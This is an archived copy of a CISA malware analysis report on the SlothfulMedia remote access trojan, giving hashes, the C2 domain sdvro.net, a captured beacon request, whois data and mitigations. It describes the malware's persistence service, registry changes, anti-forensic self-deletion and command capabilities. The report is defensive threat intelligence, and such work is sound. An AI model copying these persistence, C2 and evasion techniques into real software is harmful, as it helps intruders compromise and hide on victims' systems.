{
	"id": "c48bab4f-ba40-46d8-8e09-e56456631c0b",
	"created_at": "2026-04-06T00:08:34.299756Z",
	"updated_at": "2026-04-10T03:20:43.601402Z",
	"deleted_at": null,
	"sha1_hash": "fa45f3b24634cd6b910f773692c97e3c3aa492d2",
	"title": "MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 77655,
	"plain_text": "MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA |\r\nCISA\r\nPublished: 2020-10-01 · Archived: 2026-04-05 13:02:27 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security\r\nAgency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as SlothfulMedia, has been\r\nused by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced\r\nexposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.\r\nThe sample is a dropper, which deploys two files when executed. The first is a remote access tool (RAT) named\r\n‘mediaplayer.exe’’, which is designed for command and control (C2) of victim computer systems. Analysis has determined\r\nthe RAT has the ability to terminate processes, run arbitrary commands, take screen shots, modify the registry, and modify\r\nfiles on victim machines. It appears to communicate with its C2 controller via Hypertext Transfer Protocol (HTTP) over\r\nTransmission Control Protocol (TCP).\r\nThe second file has a random five-character name and deletes the dropper once the RAT has persistence. Persistence is\r\nachieved through the creation of a service named “Task Frame”, which ensures the RAT is loaded after a reboot.\r\nUsers or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber\r\nWatch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious\r\ncyber activity, please visit https[:]//www[.]us-cert.gov.\r\nFor a downloadable copy of IOCs, see MAR-10303705-1.v1.stix.\r\nSubmitted Files (1)\r\n64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273 (448838B2A60484EE78C2198F2C0C9C...)\r\nAdditional Files (2)\r\n4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa (wHPEO.exe)\r\n927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae (mediaplayer.exe)\r\nDomains (1)\r\nsdvro.net\r\nFindings\r\n64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nTags\r\nbotdropperinformation-stealerkeyloggerremote-access-trojantrojan\r\nDetails\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 1 of 9\n\nName 448838B2A60484EE78C2198F2C0C9C85\r\nSize 117760 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 448838b2a60484ee78c2198f2c0c9c85\r\nSHA1 f2c43a01cabaa694228f5354ea8c6bcf3b7a49b3\r\nSHA256 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nSHA512 9e532af06e5f4764529211e8c5c749baa7b01c72f11b603218c3c08d70cf1e732f8d9d81ec257ca247aaa96d1502150a2f402b1b3914780b6\r\nssdeep 3072:PGA5q4Xmco7ciR7BiU+q+TESaiQ4RHpxJdW:O0qtUYBiU+qRiQy\r\nEntropy 6.156007\r\nAntivirus\r\nBitDefender Dropped:Generic.Malware.Fdldg.B04B59A4\r\nComodo TrojWare.Win32.ButeRat.PP\r\nEmsisoft Dropped:Generic.Malware.Fdldg.B04B59A4 (B)\r\nIkarus Trojan-PWS.Win32.Zbot\r\nLavasoft Dropped:Generic.Malware.Fdldg.B04B59A4\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2019-04-29 10:19:52-04:00\r\nImport Hash 3e935061f369e95ac9d62c7cbdf4acf1\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n502dceaf120f990b5118230438102568 header 1024 2.390635\r\n1ec70611505f1cebfc859820b45b6cc3 .text 39424 6.506891\r\ndfebe81d71d56100ac07b85046f07b77 .rdata 12288 4.988754\r\n06f5259aac1a4462eaf12334dc0e8daf .data 59392 6.004077\r\nc2d6c399730fd89b16d2b6d6cec5e393 .rsrc 512 5.105006\r\n1587227ab56ecfb9c5b85aaf24d98454 .reloc 5120 3.993742\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n64d78eec46... Dropped 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa\r\n64d78eec46... Connected_To sdvro.net\r\n64d78eec46... Dropped 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 2 of 9\n\nDescription\r\nThis file is a 32-bit Windows executable. When executed, it will drop a file called 'mediaplayer.exe'\r\n(927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) into the path %AppData%\\Media\\. A link file\r\ncalled 'media.lnk' is also placed in this path. A third file is placed in the path %TEMP% and is given a five character random\r\nname with an '.exe' extension, e.g. 'wHPEO.exe'\r\n(4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa). This file is created with a 'hidden' attribute to\r\ninsure that it is not visible to the user.\r\nNext, the program will create a service on the system called \"TaskFrame\" with the following parameters:\r\n--- Begin Service Parameters ---\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    Type: 272\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    Start: 2\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    ErrorControl: 1\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    ImagePath: C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\Media\\mediaplayer.exe\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    DisplayName: TaskFrame\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    ObjectName: LocalSystem\r\n--- End Service Parameters ---\r\nThis service is used to create persistence on the system and is designed to start the 'mediaplayer.exe'\r\n(927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) program each time the system is started.\r\nNext, the program will collect system information to send to the command and control (C2). A unique identifier is created\r\nand sent in a POST request along with a Unix timestamp of the time of infection to the domain www[.]sdvro.net.\r\nConnection attempts are made via both HTTP and HTTPS. The following is a sample of the POST request:\r\n--- Begin POST Request ---\r\nPOST /v?m=u2fssrqh8cl0\u0026i=1598908417 HTTP/1.1\r\nAccept: application/octet-stream,application/xhtml\r\nContent-Length: 436\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75\r\nHost: www[.]sdvro.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n..D......!F.1y^.4.\u0026....{ ..f]..Fz...;..H.\\L`p..$.H..0A.A(An_8...;..$yH.t..4H...3..K.QvRkX.c..|r r=..V.F.....Hc.H......H.\r\n\u003c..tfH....@..uU.@.....uL..D.=o..l!'..D$hH.\u0026.H.f..H.f(..F..n.H..H.\\$`H.l$pH..0A_A]A\\_^...H.\\$.H.t..gH...3..f..K..-.\r\n..|    \r\n=../.:.....Hc.H......H.\u003c..tfH....@..uU.r.0.0.[L..t.\r\no..2!v..D\r\nhy...p.f..H.f(..F..n.H..H.\\$`H.l$pH..0A_A]A\\_^...H.\\$.H.t$.WH..03..K..K(...3..|$\r\n;=..........Hc.H......H.:..tWH....@..uU.@.....uL..D.\r\n--- End POST Request ---\r\nThe domain did not resolve to an IP address at the time of analysis. Note: The malware uses the fixed User-Agent string,\r\n\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75\" in its\r\ncommunication.\r\nThe following notable strings were found in unreferenced data within the file. The purpose of the strings could not be\r\ndetermined. The strings are not used by the code.\r\n--- Begin Notable Strings ---\r\nC:\\Users\\david\\AppData\\Roaming\\Media\\mediaplayer.exe\r\ndavid-pc\r\n--- End Notable Strings ---\r\nsdvro.net\r\nTags\r\ncommand-and-control\r\nPorts\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 3 of 9\n\n80 TCP\r\n443 TCP\r\nHTTP Sessions\r\nPOST /v?m=u2fssrqh8cl0\u0026i=1598908417 HTTP/1.1\r\nAccept: application/octet-stream,application/xhtml\r\nContent-Length: 436\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/68.0.3440.75\r\nHost: www.sdvro.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n..D......!F.1y^.4.\u0026....{ ..f]..Fz...;..H.\\L`p..$.H..0A.A(An_8...;..$yH.t..4H...3..K.QvRkX.c..|r r=..V.F.....Hc.H......H.\r\n\u003c..tfH....@..uU.@.....uL..D.=o..l!'..D$hH.\u0026.H.f..H.f(..F..n.H..H.\\$`H.l$pH..0A_A]A\\_^...H.\\$.H.t..gH...3..f..K..-.\r\n..|    \r\n=../.:.....Hc.H......H.\u003c..tfH....@..uU.r.0.0.[L..t.\r\no..2!v..D\r\nhy...p.f..H.f(..F..n.H..H.\\$`H.l$pH..0A_A]A\\_^...H.\\$.H.t$.WH..03..K..K(...3..|$\r\n;=..........Hc.H......H.:..tWH....@..uU.@.....uL..D.\r\nWhois\r\nDomain Name: SDVRO.NET\r\nRegistry Domain ID: 2371496862_DOMAIN_NET-VRSN\r\nRegistrar WHOIS Server: whois.west263.com\r\nRegistrar URL: http://www.west.cn/\r\nUpdated Date: 2020-03-31T08:26:43Z\r\nCreation Date: 2019-03-21T07:42:43Z\r\nRegistry Expiry Date: 2021-03-21T07:42:43Z\r\nRegistrar: Chengdu West Dimension Digital Technology Co., Ltd.\r\nRegistrar IANA ID: 1556\r\nRegistrar Abuse Contact Email:\r\nRegistrar Abuse Contact Phone:\r\nDomain Status: ok https://icann.org/epp#ok\r\nName Server: NS3.MYHOSTADMIN.NET\r\nName Server: NS4.MYHOSTADMIN.NET\r\nDNSSEC: unsigned\r\nDomain Name: sdvro.net                \r\nRegistry Domain ID: whois protect\r\nRegistrar WHOIS Server: whois.west.cn\r\nRegistrar URL: www.west.cn\r\nUpdated Date: 2019-03-21T07:42:42.0Z\r\nCreation Date: 2019-03-21T07:42:42.0Z\r\nRegistrar Registration Expiration Date: 2021-03-21T07:42:42.0Z\r\nRegistrar: Chengdu west dimension digital technology Co., LTD\r\nRegistrar IANA ID: 1556\r\nReseller:\r\nDomain Status: ok http://www.icann.org/epp#ok\r\nRegistry Registrant ID: Not Available From Registry\r\nRegistrant Name: REDACTED FOR PRIVACY\r\nRegistrant Organization: REDACTED FOR PRIVACY\r\nRegistrant Street: REDACTED FOR PRIVACY\r\nRegistrant City: Chengdu\r\nRegistrant State/Province: Sichuan\r\nRegistrant Postal Code: REDACTED FOR PRIVACY\r\nRegistrant Country: CN\r\nRegistrant Phone: REDACTED FOR PRIVACY\r\nRegistrant Phone Ext:\r\nRegistrant Fax: REDACTED FOR PRIVACY\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 4 of 9\n\nRegistrant Fax Ext:\r\nRegistrant Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net\r\nRegistry Admin ID: Not Available From Registry\r\nAdmin Name: REDACTED FOR PRIVACY\r\nAdmin Organization: REDACTED FOR PRIVACY\r\nAdmin Street: REDACTED FOR PRIVACY\r\nAdmin City: Chengdu\r\nAdmin State/Province: Sichuan\r\nAdmin Postal Code: REDACTED FOR PRIVACY\r\nAdmin Country: CN\r\nAdmin Phone: REDACTED FOR PRIVACY\r\nAdmin Phone Ext:\r\nAdmin Fax: REDACTED FOR PRIVACY\r\nAdmin Fax Ext:\r\nAdmin Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net\r\nRegistry Tech ID: Not Available From Registry\r\nTech Name: REDACTED FOR PRIVACY\r\nTech Organization: REDACTED FOR PRIVACY\r\nTech Street: REDACTED FOR PRIVACY\r\nTech City: Chengdu\r\nTech State/Province: Sichuan\r\nTech Postal Code: REDACTED FOR PRIVACY\r\nTech Country: CN\r\nTech Phone: REDACTED FOR PRIVACY\r\nTech Phone Ext:\r\nTech Fax: REDACTED FOR PRIVACY\r\nTech Fax Ext:\r\nTech Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net\r\nName Server: ns3.myhostadmin.net\r\nName Server: ns4.myhostadmin.net\r\nDNSSEC: signedDelegation\r\nRelationships\r\nsdvro.net Connected_From 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nDescription\r\nThis domain did not resolve to an IP address at the time of analysis.\r\n927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae\r\nTags\r\nremote-access-trojan\r\nDetails\r\nName mediaplayer.exe\r\nSize 46080 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 9f23bd89694b66d8a67bb18434da4ee8\r\nSHA1 db8c6ea90b1be5aa560bfbe5a34577eb284243af\r\nSHA256 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae\r\nSHA512 72e95a90dc8ee2fd69b26665e88d19b1d36527fe8bbc03e252d4be925cf4acae20a3155dcd7caa50daf6e16d201a16822d77356c91654a6e4\r\nssdeep 768:NRw4PZcMc8ie9+dZL6DSKdzxSGyCevVcxjw3e3PxKfRXAxo3vhxfFORpa9sxw:NRwaBiU+dZODSKeGHSaxjw3QUfRH/hx7\r\nEntropy 6.320571\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 5 of 9\n\nAntivirus\r\nBitDefender Gen:Variant.Fugrafa.6689\r\nEmsisoft Gen:Variant.Fugrafa.6689 (B)\r\nLavasoft Gen:Variant.Fugrafa.6689\r\nSymantec Heur.AdvML.B\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2019-04-29 10:18:34-04:00\r\nImport Hash db182005fc9fccab434ec0764ea5a244\r\nCompany Name Tdl Corporation\r\nFile Description Local Security Process\r\nInternal Name None\r\nLegal Copyright Copyright (C) 2018\r\nOriginal Filename None\r\nProduct Name Tdl Corporation\r\nProduct Version 1.0.0.1\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nfaf4cd402ffdb84551c382ea45f2f893 header 1024 2.514929\r\n7e3095c827af75a349f3c206925932cd .text 31232 6.493665\r\n614ccbacb5de6dae94b6af93aa5a83fc .rdata 8192 5.232371\r\n543ffbd535401feb9f37c585d9f161f3 .data 1536 4.679413\r\n7c1584feb039309d7a4307c39adaa54f .rsrc 1024 2.333786\r\n79345fb74e56359cd6eb957ceb52e0ab .reloc 3072 4.519356\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n927d945476... Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nDescription\r\nThis file is a 32-bit Windows executable file that is dropped and executed by 448838B2A60484EE78C2198F2C0C9C85.\r\nThe file is called 'mediaplayer.exe'. When executed, it will look for a file called 'Junk9' and will attempt to delete it. The file\r\n'Junk9' was not available for analysis. Next, it will take a screenshot of the user's desktop and name it 'Filter3.jpg' and store\r\nthis in the local directory. The program then looks for a service called 'TaskFrame' and attempts to start it. The 'TaskFrame'\r\nservice is able to delete, add, or modify registry keys, and start and stop a keylogger program on the system. If the\r\n'TaskFrame' service is already installed and running the program will terminate.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 6 of 9\n\nThe malware will create a mutex on the system called 'Global\\mukimukix'. The program changes the proxy configuration of\r\nthe system with the following registry modifications:\r\n--- Begin Registry Modification ---\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\r\n   Name: ProxyBypass    Value: 1\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\r\nName: IntranetName Value: 1\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\r\nName: UNCAsIntranet Value: 1\r\n--- End Registry Modification ---\r\nThe program collects the computer name, user name, OS version, adapter information, memory usage, and logical drives for\r\nthe system. This information is concatenated into a string that is hashed and sent as part of the initial POST request to the\r\nC2. The program will expect to receive a '200 OK' response from the C2 before it begins transmission. If it receives a '501\r\nError' the program sleeps for three seconds and attempts another connection. If the initial connection to the C2 is successful,\r\nthe program will await a command. The program is capable of executing the following tasks from commands issued by the\r\nC2:\r\n--- Begin Program Capabilities ---\r\n1. Create, Write, and Delete files.\r\n2. Open a Command Line.\r\n3. Move Files.\r\n4. Enumerate Open Ports.\r\n5. Enumerate Drives.\r\n6. Enumerate Processes by ID, Name, or Privileges.\r\n7. Start and Stop Processes.\r\n8. Enumerate Files and Directories.\r\n9. Open a Named Pipe and Send and Receive Data.\r\n10. Take Screenshots.\r\n11. Inject into User Processes.\r\n12. Enumerate Services.\r\n13. Start/Stop Services.\r\n14. Modify the Registry.\r\n15. Open/Close TCP and UDP Sessions.\r\n--- End Program Capabilities ---\r\nThe program will also look for the following paths: \\SetupUi, \\AppIni, and \\ExtInfo. The purpose for this search could not\r\nbe determined.\r\n4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa\r\nTags\r\nremote-access-trojan\r\nDetails\r\nName wHPEO.exe\r\nSize 7168 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 92a40c64cea4a87de1c24437612f2e0f\r\nSHA1 f52f0685a72d6a8f3e119ce92b7cf1c2c6a83bb9\r\nSHA256 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa\r\nSHA512 d0714d09dcac070eb8d0971e953ce0c0382658d5682982a8045dcf29da9a729be57dc7d60c4e18f1833966f6c6584e9a883871eef8d1c9f9d\r\nssdeep 192:DcTrBTVdZzgW+mpWpc9aThFJJRmqSA9iu:c7EmpWpc9aThFVviu\r\nEntropy 5.395407\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 7 of 9\n\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-12-04 08:14:24-05:00\r\nImport Hash 6ab19ee53c87a04ccb965f5f658b717a\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nd6cd352d657372b25707fed98bc3bd0b header 1024 2.379332\r\nc036d2e814490871e54dd84e8117e044 .text 2560 5.788179\r\n2f2819452977bcfd6dcac4389a2cd193 .rdata 1536 4.849405\r\nafadce14c7f045a0390158515331a054 .data 512 1.342806\r\n554d0cedd69e96ee00c8324ce4da604c .rsrc 1024 5.194460\r\ned7fec6ad28b233df4676dad7f306c3c .reloc 512 4.741130\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n4186b5beb5... Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nDescription\r\nThis artifact is a 32-bit Windows executable that is dropped by 448838B2A60484EE78C2198F2C0C9C85. This program\r\nhas some anti-forensic capability and is designed to clear indicators of compromise (IOCs) from the system. The program\r\nfirst verifies that the service 'TaskFrame' is running then adds the following key to the registry:\r\n--- Begin Registry Modification ---\r\nHKLM\\System\\CurrentControlSet\\Control\\SessionManager\\PendingFileRenameOperations\r\nData: \\??\\C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\wHPEO.exe\r\n--- End Registry Modification ---\r\nThis modification insures that the file is deleted with the next system restart. The program will also delete the user's\r\n'index.dat' file thus removing the user’s recent Internet history from the system.\r\nRelationship Summary\r\n64d78eec46... Dropped 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa\r\n64d78eec46... Connected_To sdvro.net\r\n64d78eec46... Dropped 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae\r\nsdvro.net Connected_From 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\n927d945476... Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\n4186b5beb5... Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 8 of 9\n\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Central .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
	],
	"report_names": [
		"ar20-275a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434114,
	"ts_updated_at": 1775791243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa45f3b24634cd6b910f773692c97e3c3aa492d2.pdf",
		"text": "https://archive.orkl.eu/fa45f3b24634cd6b910f773692c97e3c3aa492d2.txt",
		"img": "https://archive.orkl.eu/fa45f3b24634cd6b910f773692c97e3c3aa492d2.jpg"
	}
}